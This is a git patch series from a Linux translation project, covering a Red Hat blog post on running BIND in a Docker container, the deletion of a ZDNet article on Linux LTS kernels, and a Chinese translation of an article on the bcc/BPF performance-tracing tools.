SERVICE -8824c90294d5a36d396c8ab35167937f container docker - -[root@rhel7-host ~]# machinectl copy-from 8824c90294d5a36d396c8ab35167937f /etc/named.conf /srv/named/etc/named.conf - -[root@rhel7-host ~]# machinectl copy-from 8824c90294d5a36d396c8ab35167937f /var/named /srv/named/var/named - -[root@rhel7-host ~]# docker stop infallible_wescoff -``` - -### **FINAL CREATION** - -To create and run the final container, add the volume options to mount: - -* file `/srv/named/etc/named.conf` as `/etc/named.conf` - -* directory `/srv/named/var/named` as `/var/named` - -Since this is our final container, we’ll also provide a meaningful name that we can refer to later. - -``` -[root@rhel7-host ~]# docker run -d -p 53:53 -p 53:53/udp -v /srv/named/etc/named.conf:/etc/named.conf:Z -v /srv/named/var/named:/var/named:Z --name named-container named -``` - -With the final container running, we can modify the local configs to change the behavior of BIND in the container. The BIND server will need to listen on any IP that the container might be assigned. Be sure the GID of any new file matches the rest of the BIND files from the container.  - -``` -[root@rhel7-host bind]# cp named.conf /srv/named/etc/named.conf - -[root@rhel7-host ~]# cp example.com.zone /srv/named/var/named/example.com.zone - -[root@rhel7-host ~]# cp example.com.rr.zone  /srv/named/var/named/example.com.rr.zone -``` - -> [Curious why I didn’t need to change SELinux context on the host directories?][3] - -We’ll reload the config by exec’ing the `rndc` binary provided by the container. We can use `journald` in the same fashion to check the BIND logs. If you run into errors, you can edit the file on the host, and reload the config. Using `host` or `dig` on the host, we can check the responses from the contained service for example.com. - -``` -[root@rhel7-host ~]# docker exec -it named-container rndc reload        -server reload successful - -[root@rhel7-host ~]# docker exec -it named-container journalctl -u named -n --- Logs begin at Fri 2017-05-12 19:15:18 UTC, end at Fri 2017-05-12 19:29:17 UTC. -- -May 12 19:29:17 ac1752c314a7 named[27]: automatic empty zone: 9.E.F.IP6.ARPA -May 12 19:29:17 ac1752c314a7 named[27]: automatic empty zone: A.E.F.IP6.ARPA -May 12 19:29:17 ac1752c314a7 named[27]: automatic empty zone: B.E.F.IP6.ARPA -May 12 19:29:17 ac1752c314a7 named[27]: automatic empty zone: 8.B.D.0.1.0.0.2.IP6.ARPA -May 12 19:29:17 ac1752c314a7 named[27]: reloading configuration succeeded -May 12 19:29:17 ac1752c314a7 named[27]: reloading zones succeeded -May 12 19:29:17 ac1752c314a7 named[27]: zone 1.0.10.in-addr.arpa/IN: loaded serial 2001062601 -May 12 19:29:17 ac1752c314a7 named[27]: zone 1.0.10.in-addr.arpa/IN: sending notifies (serial 2001062601) -May 12 19:29:17 ac1752c314a7 named[27]: all zones loaded -May 12 19:29:17 ac1752c314a7 named[27]: running - -[root@rhel7-host bind]# host www.example.com localhost -Using domain server: -Name: localhost -Address: ::1#53 -Aliases: -www.example.com is an alias for server1.example.com. -server1.example.com is an alias for mail -``` - -> [Did your zone file not update? It might be your editor not the serial number.][4] - -### THE FINISH LINE (?) - -We’ve got what we set out to accomplish. DNS requests and zones are being served from a container. We’ve got a persistent location to manage data and configurations across updates.   - -In Part 2 of this series, we’ll see how to treat the container as a normal service on the host. - -* * * - - _[Follow the RHEL Blog][5] to receive updates on Part 2 of this series and other new posts via email._ - -* * * - -### _**Additional Resources:**_ - -#### GitHub repository for accompanying files:  [https://github.com/nzwulfin/named-container][8] - -#### **SIDEBAR 1: ** _SELinux context on local files accessed by a container_ - -You may have noticed that when I copied the files from the container to the local host, I didn’t run a `chcon` to change the files on the host to type `svirt_sandbox_file_t`.  Why didn’t it break? Copying a file into `/srv` should have made that file label type `var_t`. Did I `setenforce 0`? - -Of course not, that would make Dan Walsh cry.  And yes, `machinectl` did indeed set the label type as expected, take a look: - -Before starting the container: - -``` -[root@rhel7-host ~]# ls -Z /srv/named/etc/named.conf - --rw-r-----. unconfined_u:object_r:var_t:s0   /srv/named/etc/named.conf -``` - -No, I used a volume option in run that makes Dan Walsh happy, `:Z`.  This part of the command `-v /srv/named/etc/named.conf:/etc/named.conf:Z` does two things: first it says this needs to be relabeled with a private volume SELinux label, and second it says to mount it read / write. - -After starting the container: - -``` -[root@rhel7-host ~]# ls -Z /srv/named/etc/named.conf - --rw-r-----. root 25 system_u:object_r:svirt_sandbox_file_t:s0:c821,c956 /srv/named/etc/named.conf -``` - -#### **SIDEBAR 2: ** _VIM backup behavior can change inodes_ - -If you made the edits to the config file with `vim` on the local host and you aren’t seeing the changes in the container, you may have inadvertently created a new file that the container isn’t aware of. There are three `vim` settings that affect backup copies during editing: backup, writebackup, and backupcopy. - -I’ve snipped out the defaults that apply for RHEL 7 from the official VIM backup_table [http://vimdoc.sourceforge.net/htmldoc/editing.html#backup-table] - -``` -backup    writebackup - -   off     on backup current file, deleted afterwards (default) -``` - -So we don’t create tilde copies that stick around, but we are creating backups. The other setting is backupcopy, where `auto` is the shipped default: - -``` -"yes" make a copy of the file and overwrite the original one - "no" rename the file and write a new one - "auto" one of the previous, what works best -``` - -This combo means that when you edit a file, unless `vim` sees a reason not to (check the docs for the logic) you will end up with a new file that contains your edits, which will be renamed to the original filename when you save. This means the file gets a new inode. For most situations this isn’t a problem, but here the bind mount into the container *is* senstive to inode changes. To solve this, you need to change the backupcopy behavior. - -Either in the `vim` session or in your `.vimrc`, add `set backupcopy=yes`. This will make sure the original file gets truncated and overwritten, preserving the inode and propagating the changes into the container. - --------------------------------------------------------------------------------- - -via: http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/ - -作者:[Matt Micene ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/ -[1]:http://rhelblog.redhat.com/author/mmicenerht/ -[2]:http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/#repo -[3]:http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/#sidebar_1 -[4]:http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/#sidebar_2 -[5]:http://redhatstackblog.wordpress.com/feed/ -[6]:https://access.redhat.com/containers -[7]:http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/#repo -[8]:https://github.com/nzwulfin/named-container From db0a868c69b8137e0b7f7902b3899a25a2436301 Mon Sep 17 00:00:00 2001 From: liuyakun Date: Sun, 10 Dec 2017 23:43:42 +0800 Subject: [PATCH 0476/1627] translating by liuxinyu123 --- .../tech/20171127 ​Long-term Linux support future clarified.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171127 ​Long-term Linux support future clarified.md b/sources/tech/20171127 ​Long-term Linux support future clarified.md index e077f33425..f9e6b5d3b3 100644 --- a/sources/tech/20171127 ​Long-term Linux support future clarified.md +++ b/sources/tech/20171127 ​Long-term Linux support future clarified.md @@ -1,3 +1,5 @@ +translating by liuxinyu123 + Long-term Linux support future clarified ============================================================ From 658c087259a6302cd2fa81cbb52026d896ff15c8 Mon Sep 17 00:00:00 2001 From: liuyakun Date: Sun, 10 Dec 2017 23:46:40 +0800 Subject: [PATCH 0477/1627] =?UTF-8?q?=E5=88=A0=E9=99=A4=E5=8E=9F=E6=96=87?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Long-term Linux support future clarified.md | 54 ------------------- 1 file changed, 54 deletions(-) delete mode 100644 sources/tech/20171127 ​Long-term Linux support future clarified.md diff --git a/sources/tech/20171127 ​Long-term Linux support future clarified.md b/sources/tech/20171127 ​Long-term Linux support future clarified.md deleted file mode 100644 index f9e6b5d3b3..0000000000 --- a/sources/tech/20171127 ​Long-term Linux support future clarified.md +++ /dev/null @@ -1,54 +0,0 @@ -translating by liuxinyu123 - -Long-term Linux support future clarified -============================================================ - -Long-term support Linux version 4.4 will get six years of life, but that doesn't mean other LTS editions will last so long. - -[video](http://www.zdnet.com/video/video-torvalds-surprised-by-resilience-of-2-6-kernel-1/) - - _Video: Torvalds surprised by resilience of 2.6 kernel_ - -In October 2017, the [Linux kernel team agreed to extend the next version of Linux's Long Term Support (LTS) from two years to six years][5], [Linux 4.14][6]. This helps [Android][7], embedded Linux, and Linux Internet of Things (IoT) developers. But this move did not mean all future Linux LTS versions will have a six-year lifespan. - -As Konstantin Ryabitsev, [The Linux Foundation][8]'s director of IT infrastructure security, explained in a Google+ post, "Despite what various news sites out there may have told you, [kernel 4.14 LTS is not planned to be supported for 6 years][9]. Just because Greg Kroah-Hartman is doing it for 4.4 does not mean that all LTS kernels from now on are going to be maintained for that long." - -So, in short, 4.14 will be supported until January 2020, while the 4.4 Linux kernel, which arrived on Jan. 20, 2016, will be supported until 2022\. Therefore, if you're working on a Linux distribution that's meant for the longest possible run, you want to base it on [Linux 4.4][10]. - -[Linux LTS versions][11] incorporate back-ported bug fixes for older kernel trees. Not all bug fixes are imported; only important bug fixes are applied to such kernels. They, especially for older trees, don't usually see very frequent releases. - -The other Linux versions are Prepatch or release candidates (RC), Mainline, Stable, and LTS. - -RC must be compiled from source and usually contains bug fixes and new features. These are maintained and released by Linus Torvalds. He also maintains the Mainline tree (this is where all new features are introduced). New mainline kernels are released every few months. When the mainline kernel is released for general use, it is considered "stable." Bug fixes for a stable kernel are back-ported from the mainline tree and applied by a designated stable kernel maintainer. There are usually only a few bug-fix kernel releases until the next mainline kernel becomes available. - -As for the latest LTS, Linux 4.14, Ryabitsev said, "It is possible that someone may pick up maintainership of 4.14 after Greg is done with it (it's happened in the past on multiple occasions), but you should emphatically not plan on that." - -Kroah-Hartman simply added to Ryabitsev's post: ["What he said."][12] - --------------------------------------------------------------------------------- - -via: http://www.zdnet.com/article/long-term-linux-support-future-clarified/ - -作者:[Steven J. Vaughan-Nichols ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/ -[1]:http://www.zdnet.com/article/long-term-linux-support-future-clarified/#comments-eb4f0633-955f-4fec-9e56-734c34ee2bf2 -[2]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/ -[3]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/ -[4]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/ -[5]:http://www.zdnet.com/article/long-term-support-linux-gets-a-longer-lease-on-life/ -[6]:http://www.zdnet.com/article/the-new-long-term-linux-kernel-linux-4-14-has-arrived/ -[7]:https://www.android.com/ -[8]:https://www.linuxfoundation.org/ -[9]:https://plus.google.com/u/0/+KonstantinRyabitsev/posts/Lq97ZtL8Xw9 -[10]:http://www.zdnet.com/article/whats-new-and-nifty-in-linux-4-4/ -[11]:https://www.kernel.org/releases.html -[12]:https://plus.google.com/u/0/+gregkroahhartman/posts/ZUcSz3Sn1Hc -[13]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/ -[14]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/ -[15]:http://www.zdnet.com/blog/open-source/ -[16]:http://www.zdnet.com/topic/enterprise-software/ From 49d96d7cedf4dce6233a24f8415fbf981c353a26 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Mon, 11 Dec 2017 00:39:38 +0800 Subject: [PATCH 0478/1627] Update 20171207 7 tools for analyzing performance in Linux with bccBPF.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 翻译 7 tools for analyzing performance in Linux with bcc/BPF --- ...lyzing performance in Linux with bccBPF.md | 81 ++++++++++++------- 1 file changed, 50 insertions(+), 31 deletions(-) diff --git a/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md b/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md index d0733e0903..4e55ed979a 100644 --- a/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md +++ b/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md @@ -1,6 +1,7 @@ translating by yongshouzhang -7 tools for analyzing performance in Linux with bcc/BPF + +7个 Linux 下使用 bcc/BPF 的性能分析工具 ============================================================ ###使用伯克利的包过滤(BPF)编译器集合(BCC)工具深度探查你的 linux 代码。 @@ -18,15 +19,15 @@ opensource.com 在 linux 中出现的一种新技术能够为系统管理员和开发者提供大量用于性能分析和故障排除的新工具和仪表盘。 它被称为增强的伯克利数据包过滤器(eBPF,或BPF),虽然这些改进并不由伯克利开发,它们不仅仅是处理数据包,更多的是过滤。我将讨论在 Fedora 和 Red Hat Linux 发行版中使用 BPF 的一种方法,并在 Fedora 26 上演示。 -BPF 可以运行自定义沙盒程序在内核中即刻添加新的自定义功能。这就像可按需给 Linux 系统添加超能力一般。 你可以使用它的例子包括如下: +BPF 可以在内核中运行用户定义的沙盒程序,以立即添加新的自定义功能。这就像可按需给 Linux 系统添加超能力一般。 你可以使用它的例子包括如下: -* 高级性能跟踪工具:文件系统操作、TCP事件、用户级事件等的编程低开销指令。 +* 高级性能跟踪工具:文件系统操作、TCP事件、用户级事件等的编程低开销检测。 * 网络性能 : 尽早丢弃数据包以提高DDoS的恢复能力,或者在内核中重定向数据包以提高性能。 * 安全监控 : 24x7 小时全天候自定义检测和记录内核空间与用户空间内的可疑事件。 -在可能的情况下,BPF 程序必须通过一个内核验证机制来保证它们的安全运行,这比写自定义的内核模块更安全。我在此假设大多数人并不编写自己的 BPF 程序,而是使用别人写好的。在 GitHub 上的 [BPF Compiler Collection (bcc)][12] 项目中,我已发布许多。开源代码。bcc 提供不同的 BPF 开发前端支持,包括Python和Lua,并且是目前最活跃的 BPF 模具项目。 +在可能的情况下,BPF 程序必须通过一个内核验证机制来保证它们的安全运行,这比写自定义的内核模块更安全。我在此假设大多数人并不编写自己的 BPF 程序,而是使用别人写好的。在 GitHub 上的 [BPF Compiler Collection (bcc)][12] 项目中,我已发布许多开源代码。bcc 提供不同的 BPF 开发前端支持,包括Python和Lua,并且是目前最活跃的 BPF 模具项目。 ### 7 个有用的 bcc/BPF 新工具 @@ -43,7 +44,7 @@ Brendan Gregg, [CC BY-SA 4.0][14] ### 1\. execsnoop -Where to start? How about watching new processes. These can consume system resources, but be so short-lived they don't show up in top(1) or other tools. They can be instrumented (or, using the industry jargon for this, they can be traced) using [execsnoop][15]. While tracing, I'll log in over SSH in another window: +从哪儿开始? 如何查看新的进程。这些可以消耗系统资源,但很短暂,它们不会出现在 top(1)命令或其他工具中。 这些新进程可以使用[execsnoop] [15]进行检测(或使用行业术语,可以追踪)。 在追踪时,我将在另一个窗口中通过 SSH 登录: ``` # /usr/share/bcc/tools/execsnoop @@ -66,12 +67,13 @@ grep 12255 12254 0 /usr/bin/grep -qsi ^COLOR.*none /etc/GREP_COL grepconf.sh 12256 12239 0 /usr/libexec/grepconf.sh -c grep 12257 12256 0 /usr/bin/grep -qsi ^COLOR.*none /etc/GREP_COLORS ``` +哇。 那是什么? 什么是grepconf.sh? 什么是 /etc/GREP_COLORS? 而且 grep通过运行自身阅读它自己的配置文件? 这甚至是如何工作的? -Welcome to the fun of system tracing. You can learn a lot about how the system is really working (or not working, as the case may be) and discover some easy optimizations along the way. execsnoop works by tracing the exec() system call, which is usually used to load different program code in new processes. +欢迎来到有趣的系统追踪世界。 你可以学到很多关于系统是如何工作的(或者一些情况下根本不工作),并且发现一些简单的优化。 execsnoop 通过跟踪 exec()系统调用来工作,exec() 通常用于在新进程中加载不同的程序代码。 ### 2\. opensnoop -Continuing from above, so, grepconf.sh is likely a shell script, right? I'll run file(1) to check, and also use the [opensnoop][16] bcc tool to see what file is opening: +从上面继续,所以,grepconf.sh可能是一个shell脚本,对吧? 我将运行file(1)来检查,并使用[opensnoop][16] bcc 工具来查看打开的文件: ``` # /usr/share/bcc/tools/opensnoop @@ -89,16 +91,18 @@ PID COMM FD ERR PATH 1 systemd 16 0 /proc/565/cgroup 1 systemd 16 0 /proc/536/cgroup ``` +像execsnoop和opensnoop这样的工具每个事件打印一行。上图显示 file(1)命令当前打开(或尝试打开)的文件:返回的文件描述符(“FD”列)对于 /etc/magic.mgc 是-1,而“ERR”列指示它是“文件未找到”。我不知道该文件,也不知道 file(1)正在读取的 /usr/share/misc/magic.mgc 文件。我不应该感到惊讶,但是 file(1)在识别文件类型时没有问题: ``` # file /usr/share/misc/magic.mgc /etc/magic /usr/share/misc/magic.mgc: magic binary file for file(1) cmd (version 14) (little endian) /etc/magic: magic text file for file(1) cmd, ASCII text ``` +opensnoop通过跟踪 open()系统调用来工作。为什么不使用 strace -feopen file 命令呢? 这将在这种情况下起作用。然而,opensnoop 的一些优点在于它能在系统范围内工作,并且跟踪所有进程的 open()系统调用。注意上例的输出中包括了从systemd打开的文件。Opensnoop 也应该有更低的开销:BPF 跟踪已经被优化,并且当前版本的 strace(1)仍然使用较老和较慢的 ptrace(2)接口。 ### 3\. xfsslower -bcc/BPF can analyze much more than just syscalls. The [xfsslower][17] tool traces common XFS filesystem operations that have a latency of greater than 1 millisecond (the argument): +bcc/BPF 不仅仅可以分析系统调用。[xfsslower][17] 工具跟踪具有大于1毫秒(参数)延迟的常见XFS文件系统操作。 ``` # /usr/share/bcc/tools/xfsslower 1 @@ -115,14 +119,15 @@ TIME COMM PID T BYTES OFF_KB LAT(ms) FILENAME 14:17:46 cksum 4168 R 65536 128 1.01 grub2-fstest [...] ``` +在上图输出中,我捕获了多个延迟超过 1 毫秒 的 cksum(1)读数(字段“T”等于“R”)。这个工作是在 xfsslower 工具运行的时候,通过在 XFS 中动态地设置内核函数实现,当它结束的时候解除检测。其他文件系统也有这个 bcc 工具的版本:ext4slower,btrfsslower,zfsslower 和 nfsslower。 -This is a useful tool and an important example of BPF tracing. Traditional analysis of filesystem performance focuses on block I/O statistics—what you commonly see printed by the iostat(1) tool and plotted by many performance-monitoring GUIs. Those statistics show how the disks are performing, but not really the filesystem. Often you care more about the filesystem's performance than the disks, since it's the filesystem that applications make requests to and wait for. And the performance of filesystems can be quite different from that of disks! Filesystems may serve reads entirely from memory cache and also populate that cache via a read-ahead algorithm and for write-back caching. xfsslower shows filesystem performance—what the applications directly experience. This is often useful for exonerating the entire storage subsystem; if there is really no filesystem latency, then performance issues are likely to be elsewhere. +这是个有用的工具,也是 BPF 追踪的重要例子。对文件系统性能的传统分析主要集中在块 I/O 统计信息 - 通常你看到的是由 iostat(1)工具打印并由许多性能监视 GUI 绘制的图表。这些统计数据显示了磁盘如何执行,但不是真正的文件系统。通常比起磁盘你更关心文件系统的性能,因为应用程序是在文件系统中发起请求和等待。并且文件系统的性能可能与磁盘的性能大为不同!文件系统可以完全从内存缓存中读取数据,也可以通过预读算法和回写缓存填充缓存。xfsslower 显示了文件系统的性能 - 应用程序直接体验到什么。这对于免除整个存储子系统通常是有用的; 如果确实没有文件系统延迟,那么性能问题很可能在别处。 ### 4\. biolatency -Although filesystem performance is important to study for understanding application performance, studying disk performance has merit as well. Poor disk performance will affect the application eventually, when various caching tricks can no longer hide its latency. Disk performance is also a target of study for capacity planning. +虽然文件系统性能对于理解应用程序性能非常重要,但研究磁盘性能也是有好处的。当各种缓存技巧不能再隐藏其延迟时,磁盘的低性能终会影响应用程序。 磁盘性能也是容量规划研究的目标。 -The iostat(1) tool shows the average disk I/O latency, but averages can be misleading. It can be useful to study the distribution of I/O latency as a histogram, which can be done using [biolatency][18]: +iostat(1)工具显示平均磁盘 I/O 延迟,但平均值可能会引起误解。 以直方图的形式研究 I/O 延迟的分布是有用的,这可以通过使用 [biolatency] 来实现[18]: ``` # /usr/share/bcc/tools/biolatency @@ -142,8 +147,9 @@ Tracing block device I/O... Hit Ctrl-C to end. 1024 -> 2047 : 117 |******** | 2048 -> 4095 : 8 | | ``` +这是另一个有用的工具和例子; 它使用一个名为maps的BPF特性,它可以用来实现高效的内核内摘要统计。从内核级别到用户级别的数据传输仅仅是“计数”列。 用户级程序生成其余的。 -It's worth noting that many of these tools support CLI options and arguments as shown by their USAGE message: +值得注意的是,其中许多工具支持CLI选项和参数,如其使用信息所示: ``` # /usr/share/bcc/tools/biolatency -h @@ -169,10 +175,11 @@ examples: ./biolatency -Q # include OS queued time in I/O time ./biolatency -D # show each disk device separately ``` +它们的行为像其他Unix工具是通过设计,以协助采用。 ### 5\. tcplife -Another useful tool and example, this time showing lifespan and throughput statistics of TCP sessions, is [tcplife][19]: +另一个有用的工具是[tcplife][19] ,该例显示TCP会话的生命周期和吞吐量统计 ``` # /usr/share/bcc/tools/tcplife @@ -182,10 +189,11 @@ PID COMM LADDR LPORT RADDR RPORT TX_KB RX_KB MS 12844 wget 10.0.2.15 34250 54.204.39.132 443 11 1870 5712.26 12851 curl 10.0.2.15 34252 54.204.39.132 443 0 74 505.90 ``` +在你说:“我不能只是刮 tcpdump(8)输出这个?”之前请注意,运行 tcpdump(8)或任何数据包嗅探器,在高数据包速率系统上花费的开销会很大,即使tcpdump(8)的用户级和内核级机制已经过多年优化(可能更差)。tcplife不会测试每个数据包; 它只会监视TCP会话状态的变化,从而影响会话的持续时间。它还使用已经跟踪吞吐量的内核计数器,以及处理和命令信息(“PID”和“COMM”列),这些对 tcpdump(8)等线上嗅探工具是做不到的。 ### 6\. gethostlatency -Every previous example involves kernel tracing, so I need at least one user-level tracing example. Here is [gethostlatency][20], which instruments gethostbyname(3) and related library calls for name resolution: +之前的每个例子都涉及到内核跟踪,所以我至少需要一个用户级跟踪的例子。 这是[gethostlatency] [20],其中gethostbyname(3)和相关的库调用名称解析: ``` # /usr/share/bcc/tools/gethostlatency @@ -199,22 +207,24 @@ TIME PID COMM LATms HOST 06:45:07 12952 curl 13.64 opensource.cats 06:45:19 13139 curl 13.10 opensource.cats ``` +是的,它始终是DNS,所以有一个工具来监视系统范围内的DNS请求可以很方便(这只有在应用程序使用标准系统库时才有效)看看我如何跟踪多个查找“opensource.com”? 第一个是188.98毫秒,然后是更快,不到10毫秒,毫无疑问,缓存的作用。它还追踪多个查找“opensource.cats”,一个可悲的不存在的主机,但我们仍然可以检查第一个和后续查找的延迟。 (第二次查找后是否有一点负面缓存?) ### 7\. trace -Okay, one more example. The [trace][21] tool was contributed by Sasha Goldshtein and provides some basic printf(1) functionality with custom probes. For example: +好的,再举一个例子。 [trace] [21]工具由Sasha Goldshtein提供,并提供了一些基本的printf(1)功能和自定义探针。 例如: ``` # /usr/share/bcc/tools/trace 'pam:pam_start "%s: %s", arg1, arg2' PID TID COMM FUNC - 13266 13266 sshd pam_start sshd: root ``` +在这里,我正在跟踪 libpam 及其 pam_start(3)函数并将其两个参数都打印为字符串。 Libpam 用于可插入的身份验证模块系统,输出显示 sshd 为“root”用户(我登录)调用了 pam_start()。 USAGE消息中有更多的例子(“trace -h”),而且所有这些工具在bcc版本库中都有手册页和示例文件。 例如trace_example.txt和trace.8。 -### Install bcc via packages +### 通过包安装 bcc -The best way to install bcc is from an iovisor repository, following the instructions from the bcc [INSTALL.md][22]. [IO Visor][23] is the Linux Foundation project that includes bcc. The BPF enhancements these tools use were added in the 4.x series Linux kernels, up to 4.9\. This means that Fedora 25, with its 4.8 kernel, can run most of these tools; and Fedora 26, with its 4.11 kernel, can run them all (at least currently). +安装 bcc 最佳的方法是从 iovisor 仓储库中安装,按照 bcc [INSTALL.md][22]。[IO Visor] [23]是包含 bcc 的Linux基金会项目。4.x系列Linux内核中增加了这些工具使用的BPF增强功能,上至4.9 \。这意味着拥有4.8内核的 Fedora 25可以运行大部分这些工具。 Fedora 26及其4.11内核可以运行它们(至少目前)。 -If you are on Fedora 25 (or Fedora 26, and this post was published many months ago—hello from the distant past!), then this package approach should just work. If you are on Fedora 26, then skip to the [Install via Source][24] section, which avoids a [known][25] and [fixed][26] bug. That bug fix hasn't made its way into the Fedora 26 package dependencies at the moment. The system I'm using is: +如果你使用的是Fedora 25(或者Fedora 26,而且这个帖子已经在很多个月前发布了 - 你好,来自遥远的过去!),那么这个包的方法应该是正常的。 如果您使用的是Fedora 26,那么请跳至“通过源代码安装”部分,该部分避免了已知的固定错误。 这个错误修复目前还没有进入Fedora 26软件包的依赖关系。 我使用的系统是: ``` # uname -a @@ -222,6 +232,7 @@ Linux localhost.localdomain 4.11.8-300.fc26.x86_64 #1 SMP Thu Jun 29 20:09:48 UT # cat /etc/fedora-release Fedora release 26 (Twenty Six) ``` +以下是我所遵循的安装步骤,但请参阅INSTALL.md获取更新的版本: ``` # echo -e '[iovisor]\nbaseurl=https://repo.iovisor.org/yum/nightly/f25/$basearch\nenabled=1\ngpgcheck=0' | sudo tee /etc/yum.repos.d/iovisor.repo @@ -231,6 +242,7 @@ Total download size: 37 M Installed size: 143 M Is this ok [y/N]: y ``` +安装完成后,您可以在/ usr / share中看到新的工具: ``` # ls /usr/share/bcc/tools/ @@ -238,6 +250,7 @@ argdist dcsnoop killsnoop softirqs trace bashreadline dcstat llcstat solisten ttysnoop [...] ``` +试着运行其中一个: ``` # /usr/share/bcc/tools/opensnoop @@ -249,6 +262,7 @@ Traceback (most recent call last): raise Exception("Failed to compile BPF module %s" % src_file) Exception: Failed to compile BPF module ``` +运行失败,提示/lib/modules/4.11.8-300.fc26.x86_64/build丢失。 如果你也这样做,那只是因为系统缺少内核头文件。 如果你看看这个文件指向什么(这是一个符号链接),然后使用“dnf whatprovides”来搜索它,它会告诉你接下来需要安装的包。 对于这个系统,它是: ``` # dnf install kernel-devel-4.11.8-300.fc26.x86_64 @@ -258,6 +272,7 @@ Installed size: 63 M Is this ok [y/N]: y [...] ``` +现在 ``` # /usr/share/bcc/tools/opensnoop @@ -268,10 +283,11 @@ PID COMM FD ERR PATH 11792 ls 3 0 /lib64/libc.so.6 [...] ``` +运行起来了。 这是从另一个窗口中的ls命令捕捉活动。 请参阅前面的部分以获取其他有用的命令 -### Install via source +### 通过源码安装 -If you need to install from source, you can also find documentation and updated instructions in [INSTALL.md][27]. I did the following on Fedora 26: +如果您需要从源代码安装,您还可以在[INSTALL.md] [27]中找到文档和更新说明。 我在Fedora 26上做了如下的事情: ``` sudo dnf install -y bison cmake ethtool flex git iperf libstdc++-static \ @@ -283,12 +299,16 @@ sudo dnf install -y \ sudo pip install pyroute2 sudo dnf install -y clang clang-devel llvm llvm-devel llvm-static ncurses-devel ``` +除 netperf 外一切妥当,其中有以下错误: ``` Curl error (28): Timeout was reached for http://pkgs.repoforge.org/netperf/netperf-2.6.0-1.el6.rf.x86_64.rpm [Connection timed out after 120002 milliseconds] ``` -Here are the remaining bcc compilation and install steps: +不必理会,netperf是可选的 - 它只是用于测试 - 而 bcc 没有它也会编译成功。 + +以下是 bcc 编译和安装余下的步骤: + ``` git clone https://github.com/iovisor/bcc.git @@ -297,6 +317,7 @@ cmake .. -DCMAKE_INSTALL_PREFIX=/usr make sudo make install ``` +在这一点上,命令应该起作用: ``` # /usr/share/bcc/tools/opensnoop @@ -320,29 +341,27 @@ More Linux resources * [Our latest Linux articles][5] -This was a quick tour of the new BPF performance analysis superpowers that you can use on the Fedora and Red Hat family of operating systems. I demonstrated the popular +### 写在最后和其他前端 - [bcc][28] +这是一个可以在 Fedora 和 Red Hat 系列操作系统上使用的新 BPF 性能分析强大功能的快速浏览。我演示了BPF的流行前端 [bcc][28] ,并包含了其在 Fedora 上的安装说明。bcc 附带了60多个用于性能分析的新工具,这将帮助您充分利用Linux系统。也许你会直接通过SSH使用这些工具,或者一旦它们支持BPF,你也可以通过监视GUI来使用相同的功能。 -frontend to BPF and included install instructions for Fedora. bcc comes with more than 60 new tools for performance analysis, which will help you get the most out of your Linux systems. Perhaps you will use these tools directly over SSH, or perhaps you will use the same functionality via monitoring GUIs once they support BPF. +此外,bcc并不是开发中唯一的前端。[ply][29]和[bpftrace][30],旨在为快速编写自定义工具提供更高级的语言。此外,[SystemTap] [31]刚刚发布[版本3.2] [32],包括一个早期的实验性eBPF后端。 如果这一点继续得到发展,它将为运行多年来开发的许多SystemTap脚本和攻击集(库)提供一个生产安全和高效的引擎。 (使用SystemTap和eBPF将成为另一篇文章的主题。) -Also, bcc is not the only frontend in development. There are [ply][29] and [bpftrace][30], which aim to provide higher-level language for quickly writing custom tools. In addition, [SystemTap][31] just released [version 3.2][32], including an early, experimental eBPF backend. Should this continue to be developed, it will provide a production-safe and efficient engine for running the many SystemTap scripts and tapsets (libraries) that have been developed over the years. (Using SystemTap with eBPF would be good topic for another post.) +如果您需要开发自定义工具,那么也可以使用 bcc 来实现,尽管语言比 SystemTap,ply 或 bpftrace 要冗长得多。 我的 bcc 工具可以作为代码示例,另外我还贡献了[教程] [33]来开发 Python 中的 bcc 工具。 我建议先学习bcc多工具,因为在需要编写新工具之前,你可能会从里面获得很多里程。 您可以从他们 bcc 存储库[funccount] [34],[funclatency] [35],[funcslower] [36],[stackcount] [37],[trace] [38] ,[argdist] [39] 的示例文件中研究 bcc。 -If you need to develop custom tools, you can do that with bcc as well, although the language is currently much more verbose than SystemTap, ply, or bpftrace. My bcc tools can serve as code examples, plus I contributed a [tutorial][33] for developing bcc tools in Python. I'd recommend learning the bcc multi-tools first, as you may get a lot of mileage from them before needing to write new tools. You can study the multi-tools from their example files in the bcc repository: [funccount][34], [funclatency][35], [funcslower][36], [stackcount][37], [trace][38], and [argdist][39]. +感谢[Opensource.com] [40]进行编辑。 -Thanks to [Opensource.com][40] for edits. +###  专题 -### Topics - - [Linux][41][SysAdmin][42] + [Linux][41][系统管理员][42] ### About the author [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/brendan_face2017_620d.jpg?itok=LIwTJjL9)][43] 